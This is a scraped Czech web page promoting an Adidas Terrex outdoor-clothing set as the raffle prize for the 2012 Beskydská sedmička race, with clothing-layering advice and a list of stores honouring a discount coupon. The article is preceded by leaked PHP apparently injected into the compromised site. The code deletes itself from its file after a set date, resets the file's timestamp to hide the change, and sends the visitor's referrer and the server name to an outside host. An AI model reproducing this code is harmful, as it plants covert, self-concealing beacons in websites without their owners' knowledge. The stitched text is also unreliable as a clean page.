check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456735874){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=15&id=18776897&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/modules/mod_banners/models.php"); } HLAVNÍ CENA TOMBOLY - ADIDAS TERREX OUTDOOROVÝ SET
           
www.continental.cz
HLAVNÍ CENA TOMBOLY - ADIDAS TERREX OUTDOOROVÝ SET

AHOJ SPORTOVCI A ÚČASTNÍCI ZÁVODU ADIDAS TERREX - CONTINETAL BESKYDSKÁ SEDMIČKA

Přinášíme několik informací, které mají za cíl Vám aspoň trochu napomoci v rozhodování při výběru vhodného vybavení do závodu. Požádali jsme jednoho z generálních partnerů ADIDAS, aby Vám doporučil své výrobky, které jsou vhodné pro závodníky Beskydské sedmičky. Také jsme chtěli, aby vybrané výrobky byly vhodným doporučením i pro jiné aktivity, jako je horská turistika, trekking, běh a jiné outdoorové aktivity. Byli jsme sami překvapeni s jakou nabídkou přišli :-)

V horní animaci si můžete na našem figurantovi :-) prohlédnout jednotlivé vrstvy oblečení. PROHLÉDNĚTE SI JE POZORNĚ, protože celý set, který se skládá ze spodní vrstvy Techfit (triko a kalhoty), druhé vrstvy s vestou, softshell vrstvy (bunda a kalhoty), goretexové bundy a goretexových bot v hodnotě cca 40.000,- Kč ZÍSKÁ JEDEN Z VÁS!

CELÝ SET JE TOTIŽ HLAVNÍ CENOU V TOMBOLE! Připomínáme, že vstup do tomboly zaručuje průchod přes bránu na Lysé hoře. (Celý set bude v pánském nebo dámském provedení podle toho kdo cenu získá)

Zároveň pro všechny účastníky ADIDAS TERREX - CONTINENTAL BESKYDSKÁ SEDMIČKA 2012 jsou připraveny slevové kupony na 20% při nákupu v prodejnách Adidas (seznam prodejen, kde budete moci uplatnit kupony na slevu je uveden na konci článku)


CIBULOVÝ PRINCIP VRSTVENÍ - PÁR RAD, CO SI OBOUT A OBLÉCI NA ZÁVOD

Na náročný závod, kterým B7 bezpochyby je, byste se měli připravit nejen po fyzické stránce, ale také i po stránce sportovního vybavení. Nic Vám neznepříjemní závod víc než než pocit nekomfortu - vlhko v botách, zapaření či puchýře. Proto doporučujeme, promyslete si ještě před závodem, jakou výzbroj zvolíte.


Vaše nohy Vás ponesou celých 95 km, zpříjemněte jim cestu v dobré obuvi. Ideální je vyšší nebo nižší varianta kotníkových outdoorových bot s členitou podrážkou, která na mokrém povrchu neklouže. Boty by měly být pohodlné a předem vyzkoušené, čímž se zmenší riziko vzniku nepříjemných oděrů a puchýřů. Svrchní část obuvi by měla být s prodyšnou a voděodolnou GORE-TEX membránou, kterou jistě oceníte za nepříznivého počasí.

Spodní vrstva neboli první funkční vrstva leží přímo na těle. Její hlavní funkcí je odvádět přebytečnou vlhkost a teplo od povrchu těla. Na rozdíl od bavlněného trička se budete stále cítit v suchu a teple.

Druhá vrstva má izolační charakter. Stejně jako první vrstva nezadržuje vodu v textilii a je prodyšná, takže přebytečná tělesná vlhkost má možnost procházet dále až k úplnému odpaření. Zároveň doplňuje první vrstvu o izolační a hřejivou schopnost, čímž Vám zajistí příjemný tělesný komfort.

Softshell je lehký, prodyšný a voděodolný materiál. Bundy vyrobené z materiálu softshell zajišťují výbornou voděodolnost a odolnost proti větru, zabraňují pocitu ochlazování, a zároveň mají vynikající termoizolační vlastnosti a perfektní prodyšnost. Softwhell bundy se dají použít jako náhrada 2.vrstvy či jako třetí, vrchní vrstva.

Bunda či kalhoty s GORE-TEX® membránou jsou zárukou nejodolnějšího, prodyšného, trvanlivého a větru i vodě odolného materiálu. Oceníte je především v nepříznivém počasí, které Vás při B7 může kdykoli zastihnout.  S produkty s GORE-TEX® membránou budete na extrémní závod připraveni.


PRODEJNY KDE BUDE MOŽNÉ UPLATNIT SLEVOVÝ KUPON 

adidas značková prodejna, České Budějovice, Biskupská 1
adidas značková prodejna, Tábor, Palackého 355
adidas značková prodejna, Hradec Králové, OC Futurum
adidas značková prodejna, Zlín, Rašínova 67
adidas značková prodejna, Ostrava, Avion, Rudná 114
adidas značková prodejna, Olomouc, Horní náměstí 13
adidas značková prodejna, Olomouc, Olympia, Olomoucká 90
adidas značková prodejna, Kolín, OC Futurum, Rorejcova ul.
adidas značková prodejna, Brno, Olympie Brno, U Dálnice 777
adidas značková prodejna, Praha, NC Eden, U Slávie 1577
adidas značková prodejna, Ostrava, Karolina, Jantarová 3344/4

PLATNOST SLEVOVÉHO KUPONU JE  OD 6. 9. do 31. 10. 2012